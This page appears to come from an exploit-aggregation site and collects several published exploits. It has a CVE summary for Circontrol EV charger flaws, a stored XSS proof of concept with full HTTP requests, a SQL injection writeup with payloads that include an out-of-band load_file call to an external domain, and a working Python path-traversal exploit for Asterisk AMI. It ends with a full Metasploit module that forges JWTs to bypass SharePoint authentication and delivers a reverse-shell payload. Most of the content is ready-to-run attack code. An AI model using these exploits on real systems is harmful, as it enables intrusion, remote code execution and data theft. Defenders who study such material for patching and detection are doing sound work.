Latest exploits :: CodePwn

<pre><code>Circontrol EV Charger vulnerabilities. 1. CVE-2020-8006 Pre-Auth Stack Based Buffer Overflow CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10) The server in Circontrol Raption through 5.11.2 has a pre-authentication stack-based buffer overflow that can be exploited to gain run-time control of the device as root. When the server parses the HTTP headers and finds the Basic-Authentication tag it will call a base64 decode function. This function takes 3 arguments: an input pointer, an output pointer and a length. During the authentication flow, the input pointer can be an attacker controlled string of approximately 4096 characters, and the output pointer is located on the stack, the length argument is 512. While the length of the stack based buffer is passed to the decoder it only verifies that it is not smaller than 3. [Vendor of Product] https://circontrol.com/ [Affected Product Code Base] Raption Server - Raption up to 5.11.2 [Affected Component] OCCP 1.5, OCCP.1.6, PWRSTUDIO [Attack Type] Remote [Impact Code execution] true [Impact Denial of Service] true [Attack Vectors] Remote [Has vendor confirmed or acknowledged the vulnerability?] true [Discoverer] Abert Spruyt, Alex Salvetti, Dariusz Gońda [Reference] https://circontrol.com/intelligent-charging-solutions/dc-chargers-series/raption-150/ 2. CVE-2020-8007 - Command injection (RCE/authenticated) CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L (9.1) The pwrstudio web application of EV Charger (in the server in Circontrol Raption through 5.6.2) is vulnerable to OS command injection via three fields of the configuration menu for ntpserver0, ntpserver1, and pingip. [VulnerabilityType Other] Command Injection [Vendor of Product] https://circontrol.com/ [Affected Product Code Base] Raption Server - up to 5.6.2 [Affected Component] pwrstudio [Attack Type] Remote [Impact Code execution] true [Attack Vectors] To exploit this issue authorization is required. [Has vendor confirmed or acknowledged the vulnerability?] true [Discoverer] Abert Spruyt, Alex Salvetti, Dariusz Gońda [Reference] https://circontrol.com/intelligent-charging-solutions/dc-chargers-series/raption-150/ </code></pre>

<pre><code># Exploit Title: Workout Journal App 1.0 - Stored XSS # Date: 12.01.2024 # Exploit Author: MURAT CAGRI ALIS # Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html> # Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Windows / MacOS / Linux # CVE : CVE-2024-24050 # Description Install and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php url For the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code. # PoC Register Request to /workout-journal/endpoints/add-user.php POST /workout-journal/endpoint/add-user.php HTTP/1.1 Host: localhost Content-Length: 268 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/workout-journal/index.php Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vci Connection: close first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456- This request turn back 200 Code on Response HTTP/1.1 200 OK Date: Sat, 16 Mar 2024 02:05:52 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 214 Connection: close Content-Type: text/html; charset=UTF-8 <script> alert('Account Registered Successfully!'); window.location.href = 'http://localhost/workout-journal/'; </script> After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right. /workout-journal/home.php Request GET /workout-journal/home.php HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://localhost/workout-journal/endpoint/login.php Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1 Connection: close /workout-journal/home.php Response HTTP/1.1 200 OK Date: Sat, 16 Mar 2024 02:07:56 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4 X-Powered-By: PHP/8.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 2791 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Workout Journal App</title>  <link rel="stylesheet" href="./assets/style.css">  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"> <style> body { overflow: hidden; } </style> </head> <body> <div class="main"> <nav class="navbar navbar-expand-lg navbar-dark bg-dark"> <a class="navbar-brand ml-3" href="#">Workout Journal App</a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav ml-auto"> <li class="nav-item active"> <a class="nav-link" href="./endpoint/logout.php">Log Out</a> </li> </div> </nav> <div class="landing-page-container"> <div class="heading-container"> <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2> What would you like to do today? </div> <div class="select-option"> <div class="read-journal" onclick="redirectToReadJournal()"> <img src="./assets/read.jpg" alt=""> Read your past workout journals. </div> <div class="write-journal" onclick="redirectToWriteJournal()"> <img src="./assets/write.jpg" alt=""> Write your todays journal. </div> </div> </div> </div>  <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>  <script src="./assets/script.js"></script> </body> </html> </code></pre>

<pre><code>## Title: LMS-PHP-byoretnom23-v1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 03/28/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN (2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user/manage_user&id=7''' AND (SELECT 1734 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM (SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: page=user/manage_user&id=-2854' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/LMS-PHP-byoretnom23-v1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/lms-php-byoretnom23-v10-multiple-sqli.html) ## Time spent: 01:15:00 </code></pre>

<pre><code># Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) # Date: 2023-03-26 # Exploit Author: Sean Pesce # Vendor Homepage: https://asterisk.org/ # Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/ # Version: 18.20.0 # Tested on: Debian Linux # CVE: CVE-2023-49294 #!/usr/bin/env python3 # # Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that # facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of # file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar # to the common INI configuration format. # # References: # https://nvd.nist.gov/vuln/detail/CVE-2023-49294 # https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f # https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/ import argparse import getpass import socket import sys CVE_ID = 'CVE-2023-49294' DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding) def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp if __name__ == '__main__': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args() # Validate command-line arguments assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}' args.host = socket.gethostbyname(args.host) if args.password is None: args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ') print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr) print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr) # Connect to the Asterisk AMI server sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.connect((args.host, args.port)) # Read server banner banner = sock.recv(DEFAULT_TCP_READ_SZ) print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr) # Authenticate to the Asterisk AMI server login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password}) login_resp = tcp_send_rcv(sock, login_msg) while b'Authentication' not in login_resp: login_resp = tcp_send_rcv(sock, b'') if b'Authentication accepted' not in login_resp: print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr) sys.exit(1) #print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr) print(f'[INFO] Login success', file=sys.stderr) # Obtain file data via path traversal traversal = '../../../../../../../../' cfg_msg = ami_msg('GetConfig', { 'ActionID': args.action_id, 'Filename': f'{traversal}{args.file}', #'Category': 'default', #'Filter': 'name_regex=value_regex,', }) resp = tcp_send_rcv(sock, cfg_msg) while b'Response' not in resp: resp = tcp_send_rcv(sock, b'') print(f'', file=sys.stderr) print(f'{resp.decode("utf8")}') if b'Error' in resp: sys.exit(1) pass # Done </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'securerandom' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Sharepoint include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck class SharepointError < StandardError; end class SharepointInvalidResponseError < SharepointError; end def initialize(info = {}) super( update_info( info, 'Name' => 'Sharepoint Dynamic Proxy Generator Unauth RCE', 'Description' => %q{ This module exploits two vulnerabilities in Sharepoint 2019, an auth bypass CVE-2023-29357 which was patched in June of 2023 and CVE-2023-24955, an RCE which was patched in May of 2023. The auth bypass allows attackers to impersonate the Sharepoint Admin user. This vulnerability stems from the signature validation check used to verify JSON Web Tokens (JWTs) used for OAuth authentication. If the signing algorithm of the user-provided JWT is set to none, SharePoint skips the signature validation step due to a logic flaw in the ReadTokenCore() method. After impersonating the administrator user, the attacker has access to the Sharepoint API and is able to exploit CVE-2023-24955. This authenticated RCE vulnerability leverages the impersonated privileged account to replace the "/BusinessDataMetadataCatalog/BDCMetadata.bdcm" file in the webroot directory with a payload. The payload is then compiled and executed by Sharepoint allowing attackers to remotely execute commands via the API. }, 'Author' => [ 'Jang', # discovery 'jheysel-r7' # module ], 'References' => [ [ 'URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-may-9-2023-kb5002389-e2b77a46-2946-495f-8948-8abdc44aacc3'], [ 'URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-june-13-2023-kb5002402-c5d58925-f7be-4d16-a61b-8ce871bbe34d'], [ 'URL', 'https://testbnull.medium.com/p2o-vancouver-2023-v%C3%A0i-d%C3%B2ng-v%E1%BB%81-sharepoint-pre-auth-rce-chain-cve-2023-29357-cve-2023-24955-ed97dcab131e'], [ 'CVE', '2023-29357'], [ 'CVE', '2023-24955'] ], 'License' => MSF_LICENSE, 'Privileged' => false, 'Arch' => [ ARCH_CMD ], 'Platform' => 'win', 'Targets' => [ [ 'Windows Command', { 'Platform' => ['win'], 'Arch' => [ARCH_CMD], 'Type' => :cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp', 'WritableDir' => '%TEMP%', 'CmdStagerFlavor' => [ 'curl' ] } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-05-01', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options([ OptString.new('TARGETURI', [ true, 'The URL of the SharePoint application', '/' ]) ]) end def resolve_target_hostname res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '_api', 'web'), 'method' => 'GET', 'headers' => { # The NTLM SSP challenge: 'NTLMSSP<binary data>HOSTNAME' 'Authorization' => 'NTLM TlRMTVNTUAABAAAAA7IIAAYABgAkAAAABAAEACAAAABIT1NURE9NQUlO' } }) if res&.code == 401 && res['WWW-Authenticate'] && res['WWW-Authenticate'].match(/^NTLM\s/i) hash = res['WWW-Authenticate'].split('NTLM ')[1] message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash)) hostname = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME] hostname.force_encoding('UTF-16LE').encode('UTF-8').downcase else raise SharepointInvalidResponseError, 'The server did not return a WWW-Authenticate header' end end def get_oauth_info(hostname) vprint_status('getting oauth info') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '_api', 'web'), 'method' => 'GET', 'headers' => { # The below base64 decoded is: {"alg":"HS256"}{"nbf":"1673410334","exp":"1693410334"}aaa 'Authorization' => 'Bearer eyJhbGciOiJIUzI1NiJ9.eyJuYmYiOiIxNjczNDEwMzM0IiwiZXhwIjoiMTY5MzQxMDMzNCJ9.YWFh', 'HOST' => hostname } }) if res && res.headers['WWW-Authenticate'] raise SharepointInvalidResponseError, 'The server did not return a WWW-Authenticate header containing a realm and client_id' unless res.headers['WWW-Authenticate'] =~ /NTLM, Bearer realm="(.+)",client_id="(.+)",trusted_issuers="/ realm = Regexp.last_match(1) client_id = Regexp.last_match(2) print_status("realm: #{realm}, client_id: #{client_id}") return realm, client_id else raise SharepointInvalidResponseError, 'The server did not return a WWW-Authenticate header with getting OAuth info' end end def gen_endpoint_hash(url) Base64.strict_encode64(Digest::SHA256.digest(url.downcase)) end def gen_app_proof_token jwt_token = "{\"iss\":\"00000003-0000-0ff1-ce00-000000000000\",\"aud\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\",\"nbf\":\"1673410334\",\"exp\":\"1725093890\",\"nameid\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\", \"ver\":\"hashedprooftoken\",\"endpointurl\": \"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\": 1, \"isloopback\": \"true\"}" b64_token = Rex::Text.encode_base64(jwt_token) "eyJhbGciOiAibm9uZSJ9.#{b64_token}.YWFh" end def send_get_request(url) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, url), 'method' => 'GET', 'headers' => @auth_headers }) end def send_json_request(url, data) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, url), 'method' => 'POST', 'ctype' => 'application/json', 'headers' => @auth_headers, 'data' => data.to_json }) end def get_current_user res = send_get_request('/_api/web/currentuser') if res&.code != 200 raise SharepointInvalidResponseError, 'Failed to get current user' end res.body end def do_auth_bypass hostname = resolve_target_hostname hostname = hostname.split('.')[0] if hostname.include?('.') print_status("Discovered hostname is: #{hostname}") @realm, @client_id = get_oauth_info(hostname) print_status("Got Oauth Info: #{@realm}|#{@client_id}") @lob_id = Rex::Text.rand_text_alpha(rand(4..8)) print_status("Lob id is: #{@lob_id}") token = gen_app_proof_token @auth_headers = { 'X-PROOF_TOKEN' => token, 'Authorization' => "Bearer #{token}", 'HOST' => hostname } user_info = get_current_user raise SharepointInvalidResponseError, 'Unable to identify the current user' if user_info.nil? user_info =~ %r{<d:LoginName>.+?\|(.+)\|.+?</d:LoginName>} raise SharepointInvalidResponseError, 'Unable to identify the LoginName of the current user' unless Regexp.last_match(1) username = Regexp.last_match(1) if user_info.include?('true</d:IsSiteAdmin>') # The LoginName is formatted like so: i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint print_status("Successfully impersonated Site Admin: #{username}") else raise SharepointError, 'The user found is not a is not a Site Admin, RCE is not possible.' end @auth_bypassed = true end def check version = sharepoint_get_version return CheckCode::Unknown('Could not determine the Sharepoint version') if version.nil? print_status("Sharepoint version detected: #{version}") begin CheckCode::Vulnerable('Authentication was successfully bypassed via CVE-2023-29357 indicating this target is vulnerable to RCE via CVE-2023-24955.') if do_auth_bypass rescue SharepointInvalidResponseError => e return CheckCode::Safe(e) end end def create_c_sharp_payload(cmd) class_name = Rex::Text.rand_text_alpha(rand(4..8)) c_sharp_payload = <<~EOF #{Rex::Text.rand_text_alpha(rand(4..8))}{ class #{class_name}: System.Web.Services.Protocols.HttpWebClientProtocol{ static #{class_name}(){ System.Diagnostics.Process.Start("cmd.exe", "/c #{cmd.gsub!('\\', '\\\\\\')}"); } } } namespace #{Rex::Text.rand_text_alpha(rand(4..8))} EOF c_sharp_payload end def drop_and_execute_payload bdcm_data = "<?xml version=\"1.0\" encoding=\"utf-8\"?> <Model xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" Name=\"BDCMetadata\" xmlns=\"http://schemas.microsoft.com/windows/2007/BusinessDataCatalog\"> <LobSystems> <LobSystem Name=\"#{@lob_id}\" Type=\"WebService\"> <Properties> <Property Name=\"WsdlFetchUrl\" Type=\"System.String\">http://localhost:32843/SecurityTokenServiceApplication/securitytoken.svc?singleWsdl</Property> <Property Name=\"WebServiceProxyNamespace\" Type=\"System.String\"> <![CDATA[#{create_c_sharp_payload(payload.encoded)}]]> </Property> <Property Name=\"WsdlFetchAuthenticationMode\" Type=\"System.String\">RevertToSelf</Property> </Properties> <LobSystemInstances> <LobSystemInstance Name=\"#{@lob_id}\"></LobSystemInstance> </LobSystemInstances> <Entities> <Entity Name=\"Products\" DefaultDisplayName=\"Products\" Namespace=\"ODataDemo\" Version=\"1.0.0.0\" EstimatedInstanceCount=\"2000\"> <Properties> <Property Name=\"ExcludeFromOfflineClientForList\" Type=\"System.String\">False</Property> </Properties> <Identifiers> <Identifier Name=\"ID\" TypeName=\"System.Int32\" /> </Identifiers> <Methods> <Method Name=\"ToString\" DefaultDisplayName=\"Create Product\" IsStatic=\"false\"> <Parameters> <Parameter Name=\"@ID\" Direction=\"In\"> <TypeDescriptor Name=\"ID\" DefaultDisplayName=\"ID\" TypeName=\"System.String\" IdentifierName=\"ID\" CreatorField=\"true\" /> </Parameter> <Parameter Name=\"@CreateProduct\" Direction=\"Return\"> <TypeDescriptor Name=\"CreateProduct\" TypeName=\"System.Object\"></TypeDescriptor> </Parameter> </Parameters> <MethodInstances> <MethodInstance Name=\"CreateProduct\" Type=\"GenericInvoker\" ReturnParameterName=\"@CreateProduct\"> <AccessControlList> <AccessControlEntry Principal=\"STS|SecurityTokenService|http://sharepoint.microsoft.com/claims/2009/08/isauthenticated|true|http://www.w3.org/2001/XMLSchema#string\"> <Right BdcRight=\"Execute\" /> </AccessControlEntry> </AccessControlList> </MethodInstance> </MethodInstances> </Method> </Methods> </Entity> </Entities> </LobSystem> </LobSystems> </Model>" url_drop_payload = "/_api/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataCatalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm',overwrite=true)" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, url_drop_payload), 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'headers' => @auth_headers, 'data' => bdcm_data }) fail_with(Failure::UnexpectedReply, 'Payload delivery failed') unless res&.code == 200 print_good('Payload has been successfully delivered') entity_id = "#{SecureRandom.uuid}|4da630b6-36c5-4f55-8e01-5cd40e96104d:entityfile:Products,ODataDemo" lob_system_instance = "#{SecureRandom.uuid}|4da630b6-36c5-4f55-8e01-5cd40e96104d:lsifile:#{@lob_id},#{@lob_id}" exec_cmd_data = "<Request AddExpandoFieldTypeSuffix=\"true\" SchemaVersion=\"15.0.0.0\" LibraryVersion=\"16.0.0.0\" ApplicationName=\".NET Library\" xmlns=\"http://schemas.microsoft.com/sharepoint/clientquery/2009\"><Actions><ObjectPath Id=\"21\" ObjectPathId=\"20\" /><ObjectPath Id=\"23\" ObjectPathId=\"22\" /></Actions><ObjectPaths><Method Id=\"20\" ParentId=\"7\" Name=\"Execute\"><Parameters><Parameter Type=\"String\">CreateProduct</Parameter><Parameter ObjectPathId=\"17\" /><Parameter Type=\"Array\"><Object Type=\"String\">1</Object></Parameter></Parameters></Method><Property Id=\"22\" ParentId=\"20\" Name=\"ReturnParameterCollection\" /><Identity Id=\"7\" Name=\"#{entity_id}\" /><Identity Id=\"17\" Name=\"#{lob_system_instance}\" /></ObjectPaths></Request>" res2 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/_vti_bin/client.svc/ProcessQuery'), 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'headers' => @auth_headers, 'data' => exec_cmd_data }) fail_with(Failure::UnexpectedReply, 'Payload execution failed') unless res2&.code == 200 end def ensure_target_dir_present res = send_get_request('/_api/web/GetFolderByServerRelativeUrl(\'/\')/Folders') @backup_bdc_metadata = '' if res&.code == 200 && res&.body&.include?('BusinessDataMetadataCatalog') print_status('BDCMetadata file already present on the remote host, backing it up.') res_bdc_metadata = send_get_request("/_api/web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/$value") if res_bdc_metadata&.code == 200 && !res_bdc_metadata&.body&.empty? @backup_bdc_metadata = res_bdc_metadata.body store_bdcmetadata_loot(res_bdc_metadata.body) else print_warning('Failed to backup the existing BDCMetadata.bdcm file') end else body = { 'ServerRelativeUrl' => '/BusinessDataMetadataCatalog/' } res_json = send_json_request('/_api/web/folders', body) if res_json&.code == 201 print_status('Created BDCM Folder') else fail_with(Failure::UnexpectedReply, 'Unable to create the BDCM folder') end end end def on_new_session(_session) url_drop_payload = "/_api/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataCatalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm',overwrite=true)" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, url_drop_payload), 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'headers' => @auth_headers, 'data' => @backup_bdc_metadata }) if res&.code == 200 print_good('BDCMetadata.bdcm has been successfully restored to it\'s original state.') else print_error('BDCMetadata.bdcm restoration has failed.') end end def store_bdcmetadata_loot(data) file = store_loot('sharepoint.config', 'text/plain', rhost, data, 'BDCMetadata.bdcm', 'The original BDCMetadata.bdcm file before writing the payload to it') print_good("Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: #{file}") end def exploit # Check to see if authentication has already been bypassed in the check method, if not call do_auth_bypass. unless @auth_bypassed begin do_auth_bypass rescue SharepointError => e fail_with(Failure::NoAccess, "Auth By-pass failure: #{e}") end end # If /BusinessDataMetadataCatalog does not exist, create it. If it exists and contains BDCMetadata.bdcm, back it up. ensure_target_dir_present drop_and_execute_payload end end </code></pre>